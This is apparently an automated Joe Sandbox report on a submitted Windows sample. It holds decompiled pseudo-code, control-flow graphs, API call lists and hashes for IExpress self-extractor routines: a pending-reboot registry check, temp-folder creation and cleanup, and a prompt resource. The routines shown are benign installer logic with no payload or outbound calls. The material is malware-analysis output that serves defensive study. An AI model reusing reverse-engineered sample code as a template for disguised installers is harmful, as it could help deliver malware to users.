                            • Instruction ID: 8a88109b22ce892d0537c289f0939dd4dbf77c3f6fc196b48ab3c80267c9f5ea
                            • Opcode Fuzzy Hash: bcddbd4bf40849fb5202cdf929171f45ea7e74861a7956e3c62858bdebefe371
                            • Instruction Fuzzy Hash: EF1104727006046BD720AB279C49FEF76ADEBC1321F441275F656F2290DE74894A86A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 519 eb256d-eb257d 520 eb2583-eb2589 519->520 521 eb2622-eb2627 call eb24e0 519->521 523 eb258b 520->523 524 eb25e8-eb2607 RegOpenKeyExA 520->524 528 eb2629-eb262f 521->528 523->528 529 eb2591-eb2595 523->529 525 eb2609-eb2620 RegQueryInfoKeyA 524->525 526 eb25e3-eb25e6 524->526 530 eb25d1-eb25dd RegCloseKey 525->530 526->528 529->528 531 eb259b-eb25ba RegOpenKeyExA 529->531 530->526 531->526 532 eb25bc-eb25cb RegQueryValueExA 531->532 532->530
                            C-Code - Quality: 86%
                            			E00EB256D(signed int __ecx) {
                            				int _v8;
                            				void* _v12;
                            				signed int _t13;
                            				signed int _t19;
                            				long _t24;
                            				void* _t26;
                            				int _t31;
                            				void* _t34;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t13 = __ecx & 0x0000ffff;
                            				_t31 = 0;
                            				if(_t13 == 0) {
                            					_t31 = E00EB24E0(_t26);
                            				} else {
                            					_t34 = _t13 - 1;
                            					if(_t34 == 0) {
                            						_v8 = 0;
                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                            							goto L7;
                            						} else {
                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                            							goto L6;
                            						}
                            						L12:
                            					} else {
                            						if(_t34 > 0 && __ecx <= 3) {
                            							_v8 = 0;
                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                            							if(_t24 == 0) {
                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                            								L6:
                            								asm("sbb eax, eax");
                            								_v8 = _v8 &  !( ~_t19);
                            								RegCloseKey(_v12); // executed
                            							}
                            							L7:
                            							_t31 = _v8;
                            						}
                            					}
                            				}
                            				return _t31;
                            				goto L12;
                            			}











                            0x00eb2572
                            0x00eb2573
                            0x00eb2575
                            0x00eb2578
                            0x00eb257d
                            0x00eb2627
                            0x00eb2583
                            0x00eb2586
                            0x00eb2589
                            0x00eb25eb
                            0x00eb2607
                            0x00000000
                            0x00eb2609
                            0x00eb261a
                            0x00000000
                            0x00eb261a
                            0x00000000
                            0x00eb258b
                            0x00eb258b
                            0x00eb259e
                            0x00eb25b2
                            0x00eb25ba
                            0x00eb25cb
                            0x00eb25d1
                            0x00eb25d6
                            0x00eb25da
                            0x00eb25dd
                            0x00eb25dd
                            0x00eb25e3
                            0x00eb25e3
                            0x00eb25e3
                            0x00eb258b
                            0x00eb2589
                            0x00eb262f
                            0x00000000

                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00EB4096,00EB4096,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?), ref: 00EB25B2
                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00EB4096,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?,00EB4096), ref: 00EB25CB
                            • RegCloseKey.KERNELBASE(?,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?,00EB4096), ref: 00EB25DD
                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00EB4096,00EB4096,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?), ref: 00EB25FF
                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00EB4096,00000000,00000000,00000000,00000000,?,00EB1ED3,00000001,00000000), ref: 00EB261A
                            Strings
                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00EB25A8
                            • PendingFileRenameOperations, xrefs: 00EB25C3
                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00EB25F5
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: OpenQuery$CloseInfoValue
                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                            • API String ID: 2209512893-559176071
                            • Opcode ID: dd65d7379e5b42857675342159534e9d273bfa4299b38e6ee370a04052df8e2a
                            • Instruction ID: 103b815854ee9f3b007a693cd382e224609cc41f4e5076de0d8defb0d9e24c20
                            • Opcode Fuzzy Hash: dd65d7379e5b42857675342159534e9d273bfa4299b38e6ee370a04052df8e2a
                            • Instruction Fuzzy Hash: 1E118F35902228BFDF30AB929C09DFBBFBCEF057A5F1451A9B908B2100D6304E48D6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 533 eb6a60-eb6a91 call eb7155 call eb7208 GetStartupInfoW 539 eb6a93-eb6aa2 533->539 540 eb6abc-eb6abe 539->540 541 eb6aa4-eb6aa6 539->541 542 eb6abf-eb6ac5 540->542 543 eb6aa8-eb6aad 541->543 544 eb6aaf-eb6aba Sleep 541->544 545 eb6ad1-eb6ad7 542->545 546 eb6ac7-eb6acf _amsg_exit 542->546 543->542 544->539 548 eb6ad9-eb6ae9 call eb6c3f 545->548 549 eb6b05 545->549 547 eb6b0b-eb6b11 546->547 551 eb6b2e-eb6b30 547->551 552 eb6b13-eb6b24 _initterm 547->552 553 eb6aee-eb6af2 548->553 549->547 554 eb6b3b-eb6b42 551->554 555 eb6b32-eb6b39 551->555 552->551 553->547 556 eb6af4-eb6b00 553->556 557 eb6b67-eb6b71 554->557 558 eb6b44-eb6b51 call eb7060 554->558 555->554 560 eb6c39-eb6c3e call eb724d 556->560 559 eb6b74-eb6b79 557->559 558->557 566 eb6b53-eb6b65 558->566 563 eb6b7b-eb6b7d 559->563 564 eb6bc5-eb6bc8 559->564 569 eb6b7f-eb6b81 563->569 570 eb6b94-eb6b98 563->570 567 eb6bca-eb6bd3 564->567 568 eb6bd6-eb6be3 _ismbblead 564->568 566->557 567->568 572 eb6be9-eb6bed 568->572 573 eb6be5-eb6be6 568->573 569->564 574 eb6b83-eb6b85 569->574 575 eb6b9a-eb6b9e 570->575 576 eb6ba0-eb6ba2 570->576 572->559 573->572 574->570 578 eb6b87-eb6b8a 574->578 579 eb6ba3-eb6bbc call eb2bfb 575->579 576->579 578->570 581 eb6b8c-eb6b92 578->581 583 eb6c1e-eb6c25 579->583 584 eb6bbe-eb6bbf exit 579->584 581->574 585 eb6c32 583->585 586 eb6c27-eb6c2d _cexit 583->586 584->564 585->560 586->585
                            C-Code - Quality: 51%
                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				signed int* _t25;
                            				signed int _t26;
                            				signed int _t29;
                            				int _t30;
                            				signed int _t37;
                            				signed char _t41;
                            				signed int _t53;
                            				signed int _t54;
                            				intOrPtr _t56;
                            				signed int _t58;
                            				signed int _t59;
                            				intOrPtr* _t60;
                            				void* _t62;
                            				void* _t67;
                            				void* _t68;
                            
                            				L00EB7155();
                            				_push(0x58);
                            				_push(0xeb72b8);
                            				E00EB7208(__ebx, __edi, __esi);
                            				 *(_t62 - 0x20) = 0;
                            				GetStartupInfoW(_t62 - 0x68);
                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                            				_t53 = 0;
                            				while(1) {
                            					asm("lock cmpxchg [edx], ecx");
                            					if(0 == 0) {
                            						break;
                            					}
                            					if(0 != _t56) {
                            						Sleep(0x3e8);
                            						continue;
                            					} else {
                            						_t58 = 1;
                            						_t53 = 1;
                            					}
                            					L7:
                            					_t67 =  *0xeb88b0 - _t58; // 0x2
                            					if(_t67 != 0) {
                            						__eflags =  *0xeb88b0; // 0x2
                            						if(__eflags != 0) {
                            							 *0xeb81e4 = _t58;
                            							goto L13;
                            						} else {
                            							 *0xeb88b0 = _t58;
                            							_t37 = E00EB6C3F(0xeb10b8, 0xeb10c4); // executed
                            							__eflags = _t37;
                            							if(__eflags == 0) {
                            								goto L13;
                            							} else {
                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                            								_t30 = 0xff;
                            							}
                            						}
                            					} else {
                            						_push(0x1f);
                            						L00EB6FF4();
                            						L13:
                            						_t68 =  *0xeb88b0 - _t58; // 0x2
                            						if(_t68 == 0) {
                            							_push(0xeb10b4);
                            							_push(0xeb10ac);
                            							L00EB7202();
                            							 *0xeb88b0 = 2;
                            						}
                            						if(_t53 == 0) {
                            							 *0xeb88ac = 0;
                            						}
                            						_t71 =  *0xeb88b4;
                            						if( *0xeb88b4 != 0 && E00EB7060(_t71, 0xeb88b4) != 0) {
                            							_t60 =  *0xeb88b4; // 0x0
                            							 *0xeba288(0, 2, 0);
                            							 *_t60();
                            						}
                            						_t25 = __imp___acmdln; // 0x777d5b9c
                            						_t59 =  *_t25;
                            						 *(_t62 - 0x1c) = _t59;
                            						_t54 =  *(_t62 - 0x20);
                            						while(1) {
                            							_t41 =  *_t59;
                            							if(_t41 > 0x20) {
                            								goto L32;
                            							}
                            							if(_t41 != 0) {
                            								if(_t54 != 0) {
                            									goto L32;
                            								} else {
                            									while(_t41 != 0 && _t41 <= 0x20) {
                            										_t59 = _t59 + 1;
                            										 *(_t62 - 0x1c) = _t59;
                            										_t41 =  *_t59;
                            									}
                            								}
                            							}
                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                            								_t29 = 0xa;
                            							} else {
                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                            							}
                            							_push(_t29);
                            							_t30 = E00EB2BFB(0xeb0000, 0, _t59); // executed
                            							 *0xeb81e0 = _t30;
                            							__eflags =  *0xeb81f8;
                            							if( *0xeb81f8 == 0) {
                            								exit(_t30); // executed
                            								goto L32;
                            							}
                            							__eflags =  *0xeb81e4;
                            							if( *0xeb81e4 == 0) {
                            								__imp___cexit();
                            								_t30 =  *0xeb81e0; // 0x0
                            							}
                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                            							goto L40;
                            							L32:
                            							__eflags = _t41 - 0x22;
                            							if(_t41 == 0x22) {
                            								__eflags = _t54;
                            								_t15 = _t54 == 0;
                            								__eflags = _t15;
                            								_t54 = 0 | _t15;
                            								 *(_t62 - 0x20) = _t54;
                            							}
                            							_t26 = _t41 & 0x000000ff;
                            							__imp___ismbblead(_t26);
                            							__eflags = _t26;
                            							if(_t26 != 0) {
                            								_t59 = _t59 + 1;
                            								__eflags = _t59;
                            								 *(_t62 - 0x1c) = _t59;
                            							}
                            							_t59 = _t59 + 1;
                            							 *(_t62 - 0x1c) = _t59;
                            						}
                            					}
                            					L40:
                            					return E00EB724D(_t30);
                            				}
                            				_t58 = 1;
                            				__eflags = 1;
                            				goto L7;
                            			}


















                            0x00eb6a60
                            0x00eb6a6a
                            0x00eb6a6c
                            0x00eb6a71
                            0x00eb6a78
                            0x00eb6a7f
                            0x00eb6a85
                            0x00eb6a8e
                            0x00eb6a91
                            0x00eb6a93
                            0x00eb6a9c
                            0x00eb6aa2
                            0x00000000
                            0x00000000
                            0x00eb6aa6
                            0x00eb6ab4
                            0x00000000
                            0x00eb6aa8
                            0x00eb6aaa
                            0x00eb6aab
                            0x00eb6aab
                            0x00eb6abf
                            0x00eb6abf
                            0x00eb6ac5
                            0x00eb6ad1
                            0x00eb6ad7
                            0x00eb6b05
                            0x00000000
                            0x00eb6ad9
                            0x00eb6ad9
                            0x00eb6ae9
                            0x00eb6af0
                            0x00eb6af2
                            0x00000000
                            0x00eb6af4
                            0x00eb6af4
                            0x00eb6afb
                            0x00eb6afb
                            0x00eb6af2
                            0x00eb6ac7
                            0x00eb6ac7
                            0x00eb6ac9
                            0x00eb6b0b
                            0x00eb6b0b
                            0x00eb6b11
                            0x00eb6b13
                            0x00eb6b18
                            0x00eb6b1d
                            0x00eb6b24
                            0x00eb6b24
                            0x00eb6b30
                            0x00eb6b39
                            0x00eb6b39
                            0x00eb6b3b
                            0x00eb6b42
                            0x00eb6b57
                            0x00eb6b5f
                            0x00eb6b65
                            0x00eb6b65
                            0x00eb6b67
                            0x00eb6b6c
                            0x00eb6b6e
                            0x00eb6b71
                            0x00eb6b74
                            0x00eb6b74
                            0x00eb6b79
                            0x00000000
                            0x00000000
                            0x00eb6b7d
                            0x00eb6b81
                            0x00000000
                            0x00000000
                            0x00eb6b83
                            0x00eb6b8c
                            0x00eb6b8d
                            0x00eb6b90
                            0x00eb6b90
                            0x00eb6b83
                            0x00eb6b81
                            0x00eb6b94
                            0x00eb6b98
                            0x00eb6ba2
                            0x00eb6b9a
                            0x00eb6b9a
                            0x00eb6b9a
                            0x00eb6ba3
                            0x00eb6bab
                            0x00eb6bb0
                            0x00eb6bb5
                            0x00eb6bbc
                            0x00eb6bbf
                            0x00000000
                            0x00eb6bbf
                            0x00eb6c1e
                            0x00eb6c25
                            0x00eb6c27
                            0x00eb6c2d
                            0x00eb6c2d
                            0x00eb6c32
                            0x00000000
                            0x00eb6bc5
                            0x00eb6bc5
                            0x00eb6bc8
                            0x00eb6bcc
                            0x00eb6bce
                            0x00eb6bce
                            0x00eb6bd1
                            0x00eb6bd3
                            0x00eb6bd3
                            0x00eb6bd6
                            0x00eb6bda
                            0x00eb6be1
                            0x00eb6be3
                            0x00eb6be5
                            0x00eb6be5
                            0x00eb6be6
                            0x00eb6be6
                            0x00eb6be9
                            0x00eb6bea
                            0x00eb6bea
                            0x00eb6b74
                            0x00eb6c39
                            0x00eb6c3e
                            0x00eb6c3e
                            0x00eb6abe
                            0x00eb6abe
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
                            • String ID:
                            • API String ID: 359039474-0
                            • Opcode ID: 0e904233706104c13e879da312fd78e87e402432b3b287eabcd7d71ab410f7c2
                            • Instruction ID: b6b02fa0c82e62cbd3002bd16c1f1482bb10f07d00e1603b8d68056e71f36bac
                            • Opcode Fuzzy Hash: 0e904233706104c13e879da312fd78e87e402432b3b287eabcd7d71ab410f7c2
                            • Instruction Fuzzy Hash: EF4104719043258FDF25AB69D9957EB7BF8EB84724F54222AE841F32A0CF784C44CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 587 eb58c8-eb58d5 588 eb58d8-eb58dd 587->588 588->588 589 eb58df-eb58f1 LocalAlloc 588->589 590 eb5919-eb5959 call eb1680 call eb658a CreateFileA LocalFree 589->590 591 eb58f3-eb5901 call eb44b9 589->591 594 eb5906-eb5910 call eb6285 590->594 601 eb595b-eb596c CloseHandle GetFileAttributesA 590->601 591->594 600 eb5912-eb5918 594->600 601->594 602 eb596e-eb5970 601->602 602->594 603 eb5972-eb597b 602->603 603->600
                            C-Code - Quality: 95%
                            			E00EB58C8(intOrPtr* __ecx) {
                            				void* _v8;
                            				intOrPtr _t6;
                            				void* _t10;
                            				void* _t12;
                            				void* _t14;
                            				signed char _t16;
                            				void* _t20;
                            				void* _t23;
                            				intOrPtr* _t27;
                            				CHAR* _t33;
                            
                            				_push(__ecx);
                            				_t33 = __ecx;
                            				_t27 = __ecx;
                            				_t23 = __ecx + 1;
                            				do {
                            					_t6 =  *_t27;
                            					_t27 = _t27 + 1;
                            				} while (_t6 != 0);
                            				_t36 = _t27 - _t23 + 0x14;
                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                            				if(_t20 != 0) {
                            					E00EB1680(_t20, _t36, _t33);
                            					E00EB658A(_t20, _t36, "TMP4351$.TMP");
                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                            					_v8 = _t10;
                            					LocalFree(_t20);
                            					_t12 = _v8;
                            					if(_t12 == 0xffffffff) {
                            						goto L4;
                            					} else {
                            						CloseHandle(_t12);
                            						_t16 = GetFileAttributesA(_t33); // executed
                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                            							goto L4;
                            						} else {
                            							 *0xeb9124 = 0;
                            							_t14 = 1;
                            						}
                            					}
                            				} else {
                            					E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
                            					L4:
                            					 *0xeb9124 = E00EB6285();
                            					_t14 = 0;
                            				}
                            				return _t14;
                            			}













                            0x00eb58cd
                            0x00eb58d1
                            0x00eb58d3
                            0x00eb58d5
                            0x00eb58d8
                            0x00eb58d8
                            0x00eb58da
                            0x00eb58db
                            0x00eb58e1
                            0x00eb58ed
                            0x00eb58f1
                            0x00eb591e
                            0x00eb592c
                            0x00eb5943
                            0x00eb594a
                            0x00eb594d
                            0x00eb5953
                            0x00eb5959
                            0x00000000
                            0x00eb595b
                            0x00eb595c
                            0x00eb5963
                            0x00eb596c
                            0x00000000
                            0x00eb5972
                            0x00eb5974
                            0x00eb597a
                            0x00eb597a
                            0x00eb596c
                            0x00eb58f3
                            0x00eb5901
                            0x00eb5906
                            0x00eb590b
                            0x00eb5910
                            0x00eb5910
                            0x00eb5918

                            APIs
                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB58E7
                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5943
                            • LocalFree.KERNEL32(00000000,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB594D
                            • CloseHandle.KERNEL32(00000000,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB595C
                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5963
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                            • API String ID: 747627703-1330067808
                            • Opcode ID: 11e4ddbbb0950eaed4809de8fa5957d342d824e86f53859e13c5f3e607aeba01
                            • Instruction ID: 914cf858b49359e60bd66027aa2c8f5ef342d32ee3ba93da85d453d452e27b57
                            • Opcode Fuzzy Hash: 11e4ddbbb0950eaed4809de8fa5957d342d824e86f53859e13c5f3e607aeba01
                            • Instruction Fuzzy Hash: 4D1122726012117BCB242F7AAC0DBDB7E9DDF86374F141725F61AF31D1DA70880A86A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 652 eb51e5-eb520b call eb468f LocalAlloc 655 eb522d-eb523c call eb468f 652->655 656 eb520d-eb5228 call eb44b9 call eb6285 652->656 661 eb523e-eb5260 call eb44b9 LocalFree 655->661 662 eb5262-eb5270 lstrcmpA 655->662 668 eb52b0 656->668 661->668 666 eb527e-eb529c call eb44b9 LocalFree 662->666 667 eb5272-eb5273 LocalFree 662->667 674 eb529e-eb52a4 666->674 675 eb52a6 666->675 670 eb5279-eb527c 667->670 672 eb52b2-eb52b5 668->672 670->672 674->670 675->668
                            C-Code - Quality: 100%
                            			E00EB51E5(void* __eflags) {
                            				int _t5;
                            				void* _t6;
                            				void* _t28;
                            
                            				_t1 = E00EB468F("UPROMPT", 0, 0) + 1; // 0x1
                            				_t28 = LocalAlloc(0x40, _t1);
                            				if(_t28 != 0) {
                            					if(E00EB468F("UPROMPT", _t28, _t29) != 0) {
                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                            						if(_t5 != 0) {
                            							_t6 = E00EB44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                            							LocalFree(_t28);
                            							if(_t6 != 6) {
                            								 *0xeb9124 = 0x800704c7;
                            								L10:
                            								return 0;
                            							}
                            							 *0xeb9124 = 0;
                            							L6:
                            							return 1;
                            						}
                            						LocalFree(_t28);
                            						goto L6;
                            					}
                            					E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
                            					LocalFree(_t28);
                            					 *0xeb9124 = 0x80070714;
                            					goto L10;
                            				}
                            				E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
                            				 *0xeb9124 = E00EB6285();
                            				goto L10;
                            			}






                            0x00eb51fb
                            0x00eb5207
                            0x00eb520b
                            0x00eb523c
                            0x00eb5268
                            0x00eb5270
                            0x00eb528b
                            0x00eb5293
                            0x00eb529c
                            0x00eb52a6
                            0x00eb52b0
                            0x00000000
                            0x00eb52b0
                            0x00eb529e
                            0x00eb5279
                            0x00000000
                            0x00eb527b
                            0x00eb5273
                            0x00000000
                            0x00eb5273
                            0x00eb524a
                            0x00eb5250
                            0x00eb5256
                            0x00000000
                            0x00eb5256
                            0x00eb5219
                            0x00eb5223
                            0x00000000

                            APIs
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                              • Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                              • Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                              • Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                              • Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
                              • Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00EB2F4D,?,00000002,00000000), ref: 00EB5201
                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00EB5250
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                              • Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                            • String ID: <None>$UPROMPT
                            • API String ID: 957408736-2980973527
                            • Opcode ID: b763c9895448a76c74be6c48858895b890aca62b9e7f7ac962d669a2a7d6a20b
                            • Instruction ID: 901aa2fbfbe99122b42972e57893ea0e4e2f1c3c0d01d2ba8b49f0dace6bdfc7
                            • Opcode Fuzzy Hash: b763c9895448a76c74be6c48858895b890aca62b9e7f7ac962d669a2a7d6a20b
                            • Instruction Fuzzy Hash: 3C1126B22022016FE7156B765C46FBB31EDDBC8350F015139F702F11E1DA788C011124
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00EB52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				char _v268;
                            				signed int _t9;
                            				signed int _t11;
                            				void* _t21;
                            				void* _t29;
                            				CHAR** _t31;
                            				void* _t32;
                            				signed int _t33;
                            
                            				_t28 = __edi;
                            				_t22 = __ecx;
                            				_t21 = __ebx;
                            				_t9 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t9 ^ _t33;
                            				_push(__esi);
                            				_t31 =  *0xeb91e0; // 0xd582b0
                            				if(_t31 != 0) {
                            					_push(__edi);
                            					do {
                            						_t29 = _t31;
                            						if( *0xeb8a24 == 0 &&  *0xeb9a30 == 0) {
                            							SetFileAttributesA( *_t31, 0x80); // executed
                            							DeleteFileA( *_t31); // executed
                            						}
                            						_t31 = _t31[1];
                            						LocalFree( *_t29);
                            						LocalFree(_t29);
                            					} while (_t31 != 0);
                            					_pop(_t28);
                            				}
                            				_t11 =  *0xeb8a20; // 0x0
                            				_pop(_t32);
                            				if(_t11 != 0 &&  *0xeb8a24 == 0 &&  *0xeb9a30 == 0) {
                            					_push(_t22);
                            					E00EB1781( &_v268, 0x104, _t22, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
                            					if(( *0xeb9a34 & 0x00000020) != 0) {
                            						E00EB65E8( &_v268);
                            					}
                            					SetCurrentDirectoryA(".."); // executed
                            					_t22 =  &_v268;
                            					E00EB2390( &_v268);
                            					_t11 =  *0xeb8a20; // 0x0
                            				}
                            				if( *0xeb9a40 != 1 && _t11 != 0) {
                            					_t11 = E00EB1FE1(_t22); // executed
                            				}
                            				 *0xeb8a20 =  *0xeb8a20 & 0x00000000;
                            				return E00EB6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                            			}












                            0x00eb52b6
                            0x00eb52b6
                            0x00eb52b6
                            0x00eb52c1
                            0x00eb52c8
                            0x00eb52cb
                            0x00eb52cc
                            0x00eb52d4
                            0x00eb52d6
                            0x00eb52d7
                            0x00eb52de
                            0x00eb52e0
                            0x00eb52f2
                            0x00eb52fa
                            0x00eb52fa
                            0x00eb5302
                            0x00eb5305
                            0x00eb530c
                            0x00eb5312
                            0x00eb5316
                            0x00eb5316
                            0x00eb5317
                            0x00eb531c
                            0x00eb531f
                            0x00eb5333
                            0x00eb5345
                            0x00eb5351
                            0x00eb5359
                            0x00eb5359
                            0x00eb5363
                            0x00eb5369
                            0x00eb536f
                            0x00eb5374
                            0x00eb5374
                            0x00eb5381
                            0x00eb5387
                            0x00eb5387
                            0x00eb538f
                            0x00eb53a0

                            APIs
                            • SetFileAttributesA.KERNELBASE(00D582B0,00000080,?,00000000), ref: 00EB52F2
                            • DeleteFileA.KERNELBASE(00D582B0), ref: 00EB52FA
